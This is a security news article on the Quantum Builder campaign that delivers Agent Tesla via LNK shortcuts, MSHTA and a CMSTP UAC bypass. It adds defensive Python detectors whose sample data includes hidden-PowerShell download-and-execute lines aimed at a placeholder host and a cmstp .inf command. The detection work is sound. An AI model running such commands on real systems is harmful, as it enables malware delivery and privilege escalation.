Quantum Builder, a malware builder sold on the dark web, is being used to distribute variants of the Agent Tesla Remote Access Trojan (RAT). The campaign relies on LNK files (Windows shortcuts) to deliver the Trojan, and the builder is even offered to cybercriminal partners as a service package.
Agent Tesla, a .NET-based keylogger and remote access trojan (RAT) active since 2014, is currently being distributed by means of a builder sold on the dark web under the name "Quantum Builder". Security researchers from the Zscaler ThreatLabz team examined the current campaign and identified an evolution in tradecraft: the malware operators now rely on LNK files (Windows shortcuts), generated with Quantum Builder (also known as "Quantum Lnk Builder"), to deliver the payload. The builder has already been seen in campaigns linked to RedLine Stealer, IcedID, GuLoader, Remcos RAT and AsyncRAT.
Malicious Windows shortcuts – LNKs
In the current campaign, the threat actors use Quantum Builder to generate malicious LNK, HTA and PowerShell payloads that deliver Agent Tesla to the targeted machines. The builder-generated payloads use techniques such as a UAC bypass via the Microsoft Connection Manager Profile Installer (CMSTP) binary to run the final payload with administrative privileges and to evade Windows Defender. The multi-stage infection chain combines several attack vectors with LOLBins (living-off-the-land binaries: legitimate, signed Windows executables abused to run attacker-controlled content). To evade detection, the PowerShell scripts run in memory rather than being written to disk. In addition, decoys are used to distract the victims from the infection.
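The chain described above leaves a recognisable parent/child pattern in process-creation telemetry: Explorer spawning a hidden PowerShell, PowerShell spawning mshta.exe with a URL, mshta.exe spawning another PowerShell that loads code in memory, and finally cmstp.exe run against an .inf file outside the Windows directory. The detector below is an added example written for this page, not Zscaler's code or any part of the builder; the process events, PIDs, paths and the `example.invalid` URLs are constructed sample data, and the stage names and regexes are the author's own choices.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 style). Constructed data, not real telemetry."""
    pid: int
    ppid: int
    image: str      # lower-case executable basename
    cmdline: str


PS_HOSTS = {"powershell.exe", "pwsh.exe"}
HIDDEN = re.compile(r"-(?:w|win|windowstyle)\s+h", re.I)        # -w hidden / -WindowStyle Hidden
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s", re.I)   # -enc <base64>
URL = re.compile(r"https?://", re.I)
INMEM = re.compile(r"\biex\b|invoke-expression|downloadstring|frombase64string|\[reflection\.assembly\]::load", re.I)
INF_PATH = re.compile(r'([a-z]:\\[^\s"]+\.inf)', re.I)


def stages_for(ev: ProcEvent, parent: Optional[ProcEvent]) -> List[str]:
    """Map one event to the chain stage(s) it resembles; an empty list means nothing suspicious."""
    stages: List[str] = []
    pimg = parent.image if parent else ""
    cmd = ev.cmdline
    if ev.image in PS_HOSTS:
        # A shortcut opened in Explorer spawns PowerShell hidden, encoded, or calling mshta.
        if pimg == "explorer.exe" and (HIDDEN.search(cmd) or ENCODED.search(cmd) or "mshta" in cmd.lower()):
            stages.append("lnk-launch")
        if pimg == "mshta.exe":
            stages.append("hta-to-powershell")
        if INMEM.search(cmd):
            stages.append("in-memory-loader")
    elif ev.image == "mshta.exe" and URL.search(cmd):
        stages.append("remote-hta")
    elif ev.image == "cmstp.exe":
        # cmstp.exe fed an .inf outside %SystemRoot% is the documented proxy-execution pattern (ATT&CK T1218.003).
        m = INF_PATH.search(cmd)
        if m and "\\windows\\" not in m.group(1).lower():
            stages.append("cmstp-inf")
    return stages


def detect(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Per-process stage hits, keyed by PID."""
    by_pid = {e.pid: e for e in events}
    hits: Dict[int, List[str]] = {}
    for e in events:
        s = stages_for(e, by_pid.get(e.ppid))
        if s:
            hits[e.pid] = s
    return hits


def chains(events: List[ProcEvent], min_stages: int = 2) -> List[Tuple[int, List[str]]]:
    """Flagged leaf processes whose ancestry carries >= min_stages stages, listed root-to-leaf."""
    by_pid = {e.pid: e for e in events}
    hits = detect(events)
    parents_of_hits = {by_pid[p].ppid for p in hits}
    out: List[Tuple[int, List[str]]] = []
    for pid in sorted(hits):
        if pid in parents_of_hits:
            continue  # an ancestor of another hit; report only the deepest process
        lineage: List[str] = []
        seen, cur = set(), pid
        while cur in by_pid and cur not in seen:   # walk up; the seen-set guards against PID reuse loops
            seen.add(cur)
            lineage.extend(reversed(hits.get(cur, [])))
            cur = by_pid[cur].ppid
        lineage.reverse()
        if len(lineage) >= min_stages:
            out.append((pid, lineage))
    return out


# Constructed sample: one full chain plus three benign processes that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "C:\\Windows\\explorer.exe"),
    ProcEvent(200, 100, "powershell.exe", 'powershell.exe -w hidden -nop -c "mshta https://example.invalid/a.hta"'),
    ProcEvent(300, 200, "mshta.exe", "mshta https://example.invalid/a.hta"),
    ProcEvent(400, 300, "powershell.exe",
              "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/l.ps1')\""),
    ProcEvent(500, 400, "cmstp.exe", "cmstp.exe /ni /s C:\\Users\\victim\\AppData\\Local\\Temp\\cmstp.inf"),
    ProcEvent(600, 100, "notepad.exe", "notepad.exe C:\\Users\\victim\\notes.txt"),
    ProcEvent(700, 100, "powershell.exe", "powershell.exe"),
    ProcEvent(800, 1, "cmstp.exe", "cmstp.exe /s C:\\Windows\\System32\\legit.inf"),
]

if __name__ == "__main__":
    for pid, stages in chains(SAMPLE_EVENTS):
        print(f"chain ending in PID {pid}: {' -> '.join(stages)}")
```

Any single stage (an interactive hidden PowerShell, an admin running cmstp.exe) is a weak signal on its own; requiring two or more stages in one process lineage is what turns these LOLBin heuristics into a usable alert.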
Start with spear phishing email
The infection chain starts with a spear-phishing email carrying an LNK file packed in a GZIP archive. When the victim opens the LNK file, the PowerShell code embedded in it calls MSHTA, which runs an HTA file hosted on a remote server. The HTA file decrypts a PowerShell loader script; this loader in turn AES-decrypts and GZIP-decompresses a further PowerShell script and loads it. That script is the downloader: it first fetches the Agent Tesla binary from a remote server and then runs it with administrative privileges, using a UAC bypass via CMSTP.
The builder also offers techniques such as decoys, UAC prompts and in-memory PowerShell execution to run the final payload. All of them are updated continuously, so the malware developers effectively sell a maintained service package.
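Because the first stage is a shortcut, triage can start before anything runs: the PowerShell command line the LNK launches sits in plain sight in the file's StringData (RelativePath and CommandLineArguments), and a minimised ShowCommand or a document-style icon on a script-host target are further tells. The parser below follows the public MS-SHLLINK layout (76-byte header, optional LinkTargetIDList and LinkInfo, then the string fields) and is an added example for this page, not Zscaler's tooling; the two .lnk files it scans are built in code as constructed samples, and the indicator names, thresholds and the `example.invalid` URL are assumptions of the example.

```python
import re
import struct
from typing import Dict, List, Tuple

# Shell Link header constants from MS-SHLLINK.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
SW_SHOWMINNOACTIVE = 7   # ShowCommand value that keeps the launched window out of sight
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"), (HAS_WORKING_DIR, "working_dir"),
                 (HAS_ARGUMENTS, "arguments"), (HAS_ICON_LOCATION, "icon_location"))


def parse_lnk(data: bytes) -> Dict[str, object]:
    """Extract LinkFlags, ShowCommand and the StringData fields from a .lnk; ignores ExtraData."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    info: Dict[str, object] = {"flags": flags, "show_command": struct.unpack_from("<I", data, 60)[0]}
    off = 76
    if flags & HAS_LINK_TARGET_ID_LIST:
        off += 2 + struct.unpack_from("<H", data, off)[0]      # IDListSize (2 bytes) + IDList
    if flags & HAS_LINK_INFO:
        off += struct.unpack_from("<I", data, off)[0]          # LinkInfoSize covers the whole structure
    for flag, key in STRING_FIELDS:
        if not flags & flag:
            info[key] = ""
            continue
        count = struct.unpack_from("<H", data, off)[0]          # CountCharacters, no terminator
        off += 2
        if flags & IS_UNICODE:
            info[key] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            info[key] = data[off:off + count].decode("cp1252", errors="replace")
            off += count
    return info


SCRIPT_HOSTS = ("powershell", "pwsh", "mshta", "cmd.exe", "wscript", "cscript", "rundll32", "regsvr32", "cmstp")
HIDDEN = re.compile(r"-(?:w|win|windowstyle)\s+h", re.I)
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s", re.I)
REMOTE = re.compile(r"https?://|\\\\[a-z0-9]", re.I)           # URL or UNC path in the arguments


def indicators(info: Dict[str, object]) -> List[str]:
    """Heuristic tells for a weaponised shortcut (assumed names and thresholds)."""
    hits: List[str] = []
    args = str(info["arguments"])
    target = (str(info["relative_path"]) + " " + args).lower()
    lolbin = any(h in target for h in SCRIPT_HOSTS)
    if lolbin:
        hits.append("lolbin-target")
    if HIDDEN.search(args):
        hits.append("hidden-window")
    if ENCODED.search(args):
        hits.append("encoded-command")
    if REMOTE.search(args):
        hits.append("remote-content")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        hits.append("minimized-window")
    if len(args) > 200:
        hits.append("long-arguments")
    icon = str(info["icon_location"]).lower()
    if lolbin and icon and not any(h in icon for h in SCRIPT_HOSTS):
        hits.append("decoy-icon")   # script host dressed up with someone else's icon
    return hits


def scan_lnk(data: bytes) -> Tuple[Dict[str, object], List[str]]:
    info = parse_lnk(data)
    return info, indicators(info)


def build_lnk(relative_path: str, arguments: str, show_command: int = 1, icon_location: str = "") -> bytes:
    """Build a minimal Unicode .lnk (header, empty IDList, StringData). Constructed test input only."""
    flags = HAS_LINK_TARGET_ID_LIST | IS_UNICODE | HAS_RELATIVE_PATH | HAS_ARGUMENTS
    if icon_location:
        flags |= HAS_ICON_LOCATION
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    id_list = struct.pack("<H", 2) + b"\x00\x00"   # IDListSize=2: only the TerminalID
    strings = [relative_path, arguments] + ([icon_location] if icon_location else [])
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in strings)
    return header + id_list + body


# Constructed samples: a shortcut shaped like the campaign's first stage, and a plain editor shortcut.
MALICIOUS_LNK = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                          '-w hidden -nop -c "mshta https://example.invalid/loader.hta"',
                          show_command=SW_SHOWMINNOACTIVE, icon_location=r"%SystemRoot%\System32\shell32.dll")
BENIGN_LNK = build_lnk(r"..\..\Program Files\Notepad++\notepad++.exe", "")

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_LNK), ("benign", BENIGN_LNK)):
        info, hits = scan_lnk(blob)
        print(f"{label}: {info['relative_path']} {info['arguments']!r} -> {hits or 'clean'}")
```

On a real sample, feed the bytes of the extracted .lnk to `scan_lnk`; the parser deliberately stops before ExtraData, so a malformed trailing section cannot prevent the command line from being recovered.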
Service package for cyber criminal partners
Threat actors constantly evolve their tactics, using software such as malware "builders" sold on cybercrime marketplaces on the dark web. The Agent Tesla campaign is the latest in a series of similarly structured operations that used Quantum Builder to create malicious payloads for campaigns against organizations. The malware developers update the techniques regularly and adapt them to new security mechanisms.
More at Zscaler.com
About Zscaler
Zscaler accelerates digital transformation so customers can become more agile, efficient, resilient, and secure. Zscaler Zero Trust Exchange protects thousands of customers from cyberattacks and data loss by securely connecting people, devices, and applications anywhere. The SSE-based Zero Trust Exchange is the world's largest inline cloud security platform, distributed across 150+ data centers around the world.